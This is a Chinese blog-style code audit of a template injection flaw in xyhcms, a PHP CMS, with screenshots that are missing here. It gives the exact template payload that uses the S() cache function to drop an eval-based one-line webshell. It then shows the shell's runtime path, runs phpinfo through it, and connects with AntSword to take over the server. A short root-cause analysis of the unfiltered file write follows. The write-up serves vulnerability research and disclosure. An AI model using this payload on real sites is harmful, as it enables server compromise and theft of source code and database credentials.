xyhcms 代码审计之模板注入

sandalwood

​
本地环境搭建：官网下载：http://www.xyhcms.com/down
安装步骤：

​

编辑

​

编辑
前台效果正在上传…重新上传取消
开启后台
后台默认是关闭的，手工打开，配置如下：
打开config.php文件，将Manage放到上面，效果如下图

​

编辑
此时登录后台程序：
地址如下：

       
• 
  

http://www.xyhcms.com/index.php?s=/Manage/Login/index

​

编辑
登录后效果：

​

编辑
​​
构建后门安装完以后，查看后台的编辑功能，如下：

​

编辑
点击编辑：

​

编辑
在模板的下部分，添加恶意代码：{:S(“s”,’
eval($POST[x]);//‘)}保存成功后，前台访问：

       
• 
  

http://www.xyhcms.com
此时系统就给生成了一句话木马文件，路径为：

       
• 
  

http://www.xyhcms.com/app/runtime/temp/h8CFnHw03c7c0ace395d80182db07ae2c30f034.php

​

编辑
访问，post传参：【x=phpinfo();】后就可以看到恶意代码被执行：

​

编辑
使用蚁剑链接木马，获得服务器权限：

​

编辑
​​项目所有文件信息：

​

编辑
查看数据配置信息：

​

编辑
代码分析：File.class.php文件中有写入文件的操作，如下图：

​

编辑
此时并没有对文件内容过过滤，接着找到代用它的上级调用方法：

​

编辑
所以结合模板编辑的功能，虽然做了常规的PHP的过滤如下图所示：

​

编辑
但是通过这种合规函数变相绕过，就可以拿些服务器权限，造成服务器沦陷。
至此，通过系统合规函数，构建恶意代码，实现代码执行。，拿到了服务器全部权限、源码，以及数据库信息，造成了很严重的后果。
​